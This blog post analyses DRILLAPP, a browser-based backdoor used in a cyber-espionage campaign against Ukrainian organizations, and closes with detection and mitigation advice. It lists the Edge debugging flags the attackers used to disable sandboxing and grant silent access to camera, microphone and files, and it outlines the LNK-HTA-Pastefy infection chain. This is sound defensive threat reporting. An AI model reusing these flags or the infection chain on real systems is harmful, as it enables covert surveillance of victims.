top of page
Buscar

DRILLAPP: When the Browser Becomes the Spy

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • 16 mar
  • 4 Min. de lectura

A new cyber-espionage campaign targeting Ukrainian organizations reveals how attackers are increasingly abusing legitimate software features to evade detection. The operation deploys a JavaScript-based backdoor called DRILLAPP, executed through Microsoft Edge in headless debugging mode, effectively turning the browser itself into a surveillance tool.

The campaign, observed in February 2026, shows strong overlap with activity previously attributed to Laundry Bear (UAC-0190 / Void Blizzard), a threat actor linked to Russia that has targeted Ukrainian defense entities in earlier operations using the PLUGGYAPE malware family.

Rather than relying on traditional malware loaders or suspicious executables, the attackers leverage browser debugging parameters and legitimate web capabilities to perform espionage tasks. This approach enables stealthy access to sensitive device resources—such as microphones, webcams, and the local file system—while blending into normal browser activity.


Phase 1 — Deception & Delivery 


The intrusion begins with phishing lures targeting Ukrainian entities, including organizations connected to defense and public institutions.

The attackers craft contextualized messages designed to appear legitimate, often referencing topics relevant to the Ukrainian environment. Examples include:

  • Requests related to Starlink installation

  • Communications referencing the Come Back Alive Foundation, a Ukrainian charity supporting the military

  • Judicial or administrative themed communications

These lures deliver Windows shortcut (LNK) files, which act as the first stage of the attack chain.

When opened, the LNK file silently creates an HTML Application (HTA) inside the system’s temporary directory.

This HTA then retrieves an obfuscated JavaScript payload hosted on Pastefy, a legitimate paste service frequently used by developers to share code snippets.

To ensure persistence, the attackers copy the LNK file into the Windows Startup folder, guaranteeing the malicious execution occurs automatically after system reboot.


Phase 2 — Browser-Based Execution 


Once triggered, the HTA launches Microsoft Edge in headless mode, meaning the browser runs without displaying a visible interface to the user.

The attackers pass a series of unsafe debugging parameters that weaken browser security restrictions:

  • --no-sandbox

  • --disable-web-security

  • --allow-file-access-from-files

  • --use-fake-ui-for-media-stream

  • --auto-select-screen-capture-source=true

  • --disable-user-media-security

These flags allow the browser process to access sensitive system resources without requiring user interaction, including:

  • Local file system

  • Microphone input

  • Webcam video

  • Screen capture

Because Edge is a trusted and widely used application, its execution does not immediately appear suspicious to many security tools.

The browser then loads the remote obfuscated JavaScript hosted on Pastefy, which deploys the DRILLAPP backdoor.


Phase 3 — Backdoor Activation & Data Collection 


Once active, DRILLAPP functions as a lightweight espionage backdoor executed entirely within the browser environment.

Its capabilities include:

  • Uploading and downloading files

  • Capturing microphone audio

  • Taking images via the webcam

  • Capturing screenshots of the victim’s display

  • Enumerating files within the local system

The malware also generates a unique device fingerprint using canvas fingerprinting, a technique commonly used by web tracking systems to identify browsers.

This fingerprint data is transmitted to the attackers together with the victim’s country, which the malware determines by analyzing the system timezone.

Countries specifically checked by the malware include:

  • Ukraine

  • Russia

  • United Kingdom

  • Germany

  • France

  • China

  • Japan

  • United States

  • Brazil

  • India

  • Canada

  • Australia

  • Italy

  • Spain

  • Poland

If none of these match, the malware defaults to United States.


Phase 4 — Command-and-Control Communication 


The backdoor retrieves its command-and-control (C2) endpoint through Pastefy, which acts as a dead-drop resolver.

From there, the malware receives a WebSocket URL, which is used for real-time communication with the attackers.

Through this channel, DRILLAPP can:

  • Receive commands

  • Upload captured data

  • Transfer files

  • Execute additional operations on the compromised device

Because WebSocket communication is widely used in legitimate applications, the traffic can appear normal within network monitoring tools.


Phase 5 — Malware Evolution & Improved Capabilities 


Researchers identified two versions of the campaign.


Early February Variant


The initial attack chain relied on:

  • LNK files

  • HTA execution

  • JavaScript payload from Pastefy

  • Edge debugging parameters


Late February Variant


A more advanced version replaced LNK delivery with Windows Control Panel modules, while maintaining the same overall infection chain.

The updated DRILLAPP backdoor introduced additional capabilities:

  • Recursive file enumeration

  • Batch file uploads

  • Arbitrary file downloads

To enable remote file downloads—something JavaScript cannot normally do—the attackers abused the Chrome DevTools Protocol (CDP).

This protocol is normally used by developers for browser debugging, but becomes accessible when Edge runs with the parameter:

--remote-debugging-port

Using CDP allows the attackers to remotely instruct the browser to download files, bypassing standard web security restrictions.


Why This Technique Is Dangerous


The campaign demonstrates a shift toward browser-native malware techniques.

Browsers provide attackers with several advantages:

  • They are trusted and commonly executed processes

  • They already possess access to sensitive resources such as microphones and cameras

  • Debugging features can expose powerful internal capabilities

  • Network traffic generated by browsers is less likely to raise suspicion

By abusing debugging parameters, the attackers effectively transform a legitimate browser into a covert surveillance tool.


Measures to Fend Off the Attack 


Organizations can mitigate this threat by implementing several defensive controls:

  • Detect browsers launched with suspicious debugging parameters

  • Monitor execution chains involving LNK → HTA files

  • Restrict or alert on headless execution of Microsoft Edge

  • Inspect network traffic to paste services such as Pastefy

  • Detect WebSocket connections to unknown infrastructure

  • Monitor abnormal access to camera, microphone, and screen capture APIs

  • Deploy behavior-based EDR solutions capable of detecting browser abuse

  • Restrict execution of HTA files where possible

  • Audit persistence mechanisms such as Windows Startup folder modifications


The DRILLAPP campaign highlights an emerging evolution in cyber-espionage tradecraft. Instead of deploying traditional malware binaries, attackers increasingly exploit legitimate software features to conduct surveillance while evading detection.

By abusing browser debugging capabilities, the operators behind this campaign effectively turn Microsoft Edge into a covert espionage platform capable of collecting audio, video, files, and screen data directly from infected systems.


As browsers continue to expand their capabilities—and as debugging tools expose deeper system access—their misuse is likely to become an increasingly attractive vector for stealthy cyber operations.

Defenders must therefore begin treating browsers not only as user applications, but also as potential execution environments for advanced malware.



The Hacker News


 
 
 

Comentarios

bottom of page